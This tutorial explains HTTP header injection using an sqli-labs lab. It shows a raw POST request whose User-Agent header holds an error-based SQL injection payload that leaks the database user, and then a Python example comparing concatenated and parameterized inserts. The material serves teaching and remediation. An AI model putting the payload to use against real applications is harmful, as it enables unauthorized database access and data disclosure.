HTTP header injection is a security vulnerability that occurs when an attacker is able to inject malicious content into HTTP headers. This can have various security implications, including the potential for cross-site scripting (XSS) attacks or other forms of web application exploitation.
Example:
POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: 192.168.1.33
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.33
Content-Type: application/x-www-form-urlencoded
User-Agent:1' and updatexml(1,concat(0x7e,(user()),0x7e),1) and '1'='1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.33/sqli-labs-master/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

uname=admin&passwd=admin&submit=Submit

XPATH syntax error: '~root@localhost~'
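
The error above appears because the application places the User-Agent value into a SQL statement. The following added example (not code from the original page or from sqli-labs) contrasts a concatenated insert with a parameterized one, using SQLite as a stand-in for the lab's MySQL; the table, column and function names and the client IP are assumptions.

```python
import sqlite3

# Constructed sample: the User-Agent value from the request shown above.
INJECTED_UA = "1' and updatexml(1,concat(0x7e,(user()),0x7e),1) and '1'='1"
NORMAL_UA = "Mozilla/5.0 (X11; Linux x86_64)"
CLIENT_IP = "192.0.2.10"  # constructed placeholder address


def make_db():
    """In-memory stand-in for the application's database (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE uagents (uagent TEXT, ip TEXT, username TEXT)")
    return db


def log_agent_vulnerable(db, user_agent, ip, username):
    """Builds the statement by string concatenation: header text becomes SQL."""
    sql = ("INSERT INTO uagents (uagent, ip, username) "
           f"VALUES ('{user_agent}', '{ip}', '{username}')")
    db.execute(sql)


def log_agent_safe(db, user_agent, ip, username):
    """Binds the header as a parameter: it is stored as data, never parsed."""
    db.execute(
        "INSERT INTO uagents (uagent, ip, username) VALUES (?, ?, ?)",
        (user_agent[:512], ip, username),  # length cap is an added hardening choice
    )


def stored_agents(db):
    return [row[0] for row in db.execute("SELECT uagent FROM uagents")]


def vulnerable_outcome(user_agent):
    """Returns 'stored', or the database error raised while parsing the header."""
    db = make_db()
    try:
        log_agent_vulnerable(db, user_agent, CLIENT_IP, "admin")
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"
    return "stored"


if __name__ == "__main__":
    print(vulnerable_outcome(NORMAL_UA))
    print(vulnerable_outcome(INJECTED_UA))
    db = make_db()
    log_agent_safe(db, INJECTED_UA, CLIENT_IP, "admin")
    print(stored_agents(db))
```

SQLite has no `updatexml()`, so the concatenated version fails with a different error than MySQL's XPATH message, but the cause is the same: the database parsed header text as part of the statement. Returning such database errors to the client is what exposed `root@localhost` in the response above.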